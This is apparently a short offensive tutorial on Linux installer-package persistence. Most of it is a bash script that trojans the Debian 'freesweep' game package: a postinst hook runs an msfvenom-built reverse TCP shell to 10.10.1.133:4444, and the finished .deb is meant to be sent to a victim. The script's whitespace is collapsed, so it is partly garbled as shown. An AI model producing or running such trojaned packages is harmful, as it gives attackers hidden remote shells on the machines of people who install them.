Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system.
Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts.
First we need to locate a DEB package that we are going to infect with our payload will set everything in our temp folder, I've automated the process and built a small bash script to create the DEB file we send it to the user, and when the user installs
BuildbackdoorDEB:sudoapt-get--download-onlyinstallfreesweepmkdirevilsudomv/var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb/tmp/evilcdevildpkg-xfreesweep_1.0.2-1_amd64.debworkmkdirwork/DEBIANcdwork/DEBIAN# Define the content of the control file and create the filecat<<EOL>controlPackage: freesweepVersion: 0.90-1Section: Games and AmusementPriority: optionalArchitecture: i386Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.EOL# Notify the user that the file has been createdecho"The control file has been created and populated."# Now build a postinst filecat<<EOL>postinst#!/bin/shsudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &EOL# Tell user files are builtecho"Files built successfuly"# Build the payloadmsfvenom--platformlinux-ax64--payloadlinux/x64/shell_reverse_tcpLHOST=10.10.1.133LPORT=4444-b"\x00"-felf-o/tmp/evil/work/usr/games/freesweep_scoresecho"Payload has been built"# Change the valueschmod755postinst# Build the packagedpkg-deb--build/tmp/evil/work# Move back 2 directoriescd../..# Rename file to whatever "freesweep" heremvwork.debfreesweep.debecho"All files created send target file FREESWEEP.DEB"